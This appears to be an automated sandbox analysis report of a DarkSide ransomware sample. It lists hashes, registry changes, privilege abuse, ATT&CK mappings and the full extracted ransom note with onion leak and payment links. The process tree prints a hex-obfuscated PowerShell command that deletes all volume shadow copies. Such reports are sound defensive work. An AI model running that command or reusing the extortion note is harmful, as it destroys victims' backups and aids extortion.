darkside | 0f808fd3ecf9d722aafeee46b57aad4d07f39c98be6f6148be979ed470cf0a99

Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
27-01-2024 19:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Size

59KB
MD5

c830512579b0e08f40bc1791fc10c582
SHA1

2fc8514367d4799d90311b1b1f277b3fca5ca731
SHA256

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975
SHA512

b8e7dc2b26ff00c43dae3e5ceb2b241bc7211c52fba167f1dfd81b285461fd53668953ede798a5f4fd1c587ee9861c2ca0fd034a958428dd3d9f5177c61b5ca3
SSDEEP

768:TTjagICPhDt3bS4nyz2CuwSbV5dNcxGV1ylBpoT6Y23W5o:BpDtG4nMpboDTV1ylXsZ5

Score

10^/10

darkside ransomware spyware stealer

Malware Config

Extracted

Path

C:\Users\Admin\README.c05ced76.TXT

Family

darkside

Ransom Note

----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then full dump data. These files include: - finance - private information - partners documents Your personal leak page: http://darksidedxcftmqa.onion/DWMRLAW/N9N6W7_4EpBFAgHXuDGQwpXTQSpdXdKqYN_rPUXHIsXGkuZCNNHvRC8amaoegEAh On the page you will find examples of files that have been downloaded. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/WKWM6ZXNBVAFW62I1RTLLD4A82OO2O7NBOKLF05CRB4BD06IRBQ0MFA9ZFAKDZH2 When you open our website, put the following data in the input form: Key: LLMNoy1cxUU5F3v2Zv7YhAQxOzdaQF3sOKD9aqFmUCkPeGBCvfM2DiV1zVX7HtYMs8QFQS4jxs4WPZiBVqJwAF5F0pA5SABPG1siAW3c69erGlmUdjURFkmncQQ2FLnzvc3AK1BCuDaxVO2DVr6X5itNLmAtbEKwlUGvyl1oYoSzeIrHqYHTZ5lhhHjuT2UaWJuCJv6wQuEJsolQ2aAZtiM7PZh7AKUR4DdKRaRe3TMOUrm2xnvQ3pZXFRuMTewibx6wmtxLJjTqxJ1Yr5hiJ4uhkOUrni5SxDvlt0bC5dk4eQtIDP2xICeMOYjrLCPpC2hk0JTpp8azhIUZbjy9fXBg0mhuGNufnTPYXtE4RYKCOb7ZphasVglR8j0Mo4JGTRiff1BB9DjCClsf1S9RS6vAtHlLudqyyhmWwURQeS4JSNlZTjOUJUUzvM3S8LXnNAqoX5qtLMXUjiYuMuDwnFQPcvTgK0j8ewGtxNI63ObxyvvVV4Ya4ALZNqA3tO76TcjrW294C3yZcEfFLvv9JUJ0jnDtNEPNGyN1wQUPkTeNZ1Z0LVa5MRP !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!

URLs

http://darksidedxcftmqa.onion/DWMRLAW/N9N6W7_4EpBFAgHXuDGQwpXTQSpdXdKqYN_rPUXHIsXGkuZCNNHvRC8amaoegEAh

http://darksidfqzcuhtk2.onion/WKWM6ZXNBVAFW62I1RTLLD4A82OO2O7NBOKLF05CRB4BD06IRBQ0MFA9ZFAKDZH2

Signatures

DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
ransomware darkside
Renames multiple (157) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\c05ced76.BMP"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\c05ced76.BMP"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Modifies Control Panel 1 IoCs

evasion

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\WallpaperStyle = "10"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Modifies registry class 5 IoCs

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.c05ced76	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.c05ced76\ = "c05ced76"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\c05ced76\DefaultIcon	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\c05ced76	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\c05ced76\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\c05ced76.ico"	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

pid	process
2376	powershell.exe
2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exepowershell.exevssvc.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSecurityPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeTakeOwnershipPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeLoadDriverPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSystemProfilePrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSystemtimePrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeProfSingleProcessPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeIncBasePriorityPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeCreatePagefilePrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeBackupPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeRestorePrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeShutdownPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeDebugPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeSystemEnvironmentPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeRemoteShutdownPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeUndockPrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeManageVolumePrivilege	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: 33	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: 34	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: 35	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeBackupPrivilege	3000	vssvc.exe
Token: SeRestorePrivilege	3000	vssvc.exe
Token: SeAuditPrivilege	3000	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe

description	pid	process	target process
PID 2108 wrote to memory of 2376	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe	powershell.exe
PID 2108 wrote to memory of 2376	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe	powershell.exe
PID 2108 wrote to memory of 2376	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe	powershell.exe
PID 2108 wrote to memory of 2376	2108	12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe	powershell.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe
"C:\Users\Admin\AppData\Local\Temp\12ee27f56ec8a2a3eb2fe69179be3f7a7193ce2b92963ad33356ed299f7ed975.exe"
1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2376

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3000

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
2f3c1c3f6564ad98280a5d7a5afac376

SHA1
9c3c8ee50169a14e69dcf4925ee6b62216ba531b

SHA256
316df8a71dc747ceae617c394e92540de1934ecc55c7a65dc47720f95c71d6ec

SHA512
28c2219adf21efe32650e5a955dd7f266f469f5024a2605d67c93e4b25f9386dd8d75d76817d7332b88a0b28e7fd68401c4dcc69b3c2614c79ef9115d5fe3cea

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab14F9.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar150C.tmp
Filesize
45KB

MD5
39e5fbc2468049e7608dd3a2f8bf6b73

SHA1
7270ab5b75010104db4ffbb29f5891061eca6e1b

SHA256
ed75b246d1926256358d292418e32399ee8c67cdc78999eb2c92be77ae1c139e

SHA512
e95c99a108d4012aa53c0d334df68d1ff98d8ed5d007453b767a00e8eebdd6bc2be604031daec8cbd9632ca1c64d9f245dcecfaa0b10584f7d2e47316ad2615b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
7ba5901e310c1b7615028c2428db0bb4

SHA1
b3e917108ce152c314753b37b2b6d83f8f19cf6e

SHA256
78cb22497f2ca240bc93d238ef9abfbb0c004e8e01415b294db428c9c7a05db8

SHA512
c2cb8fe18c8e0662724aa55e8e49cfc59c128b60870a7f0aa31f76a6426eac739d4771f18e2d4d6a70d4a1e4dbad04768299a3bbcd06998fe2d8e84d6c990bbd

Download Submit
C:\Users\Admin\README.c05ced76.TXT
Filesize
2KB

MD5
86ed12570f541fd2bf8ae4fa9aff91cb

SHA1
c6ee9fc8ffa7ef75ae8d47121acc9a6ddda61cf5

SHA256
50bd4749aad523d02ef33e49aaea309acba5ac9f4ea0719d3f6d26185993f01d

SHA512
146dc076237f2b9c1fff0d144dbc18a162c94bc42daef9bed35eeccd15468ae64c7dcacdc6f12bda63c5abb2e167edf286429d77a3e19828159f66731ddb37b0

Download Submit
memory/2376-64-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2376-62-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2376-63-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2376-59-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/2376-58-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2376-65-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/2376-61-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp

Filesize
9.6MB

Download
memory/2376-60-0x0000000002880000-0x0000000002900000-memory.dmp

Filesize
512KB

Download
memory/2376-57-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download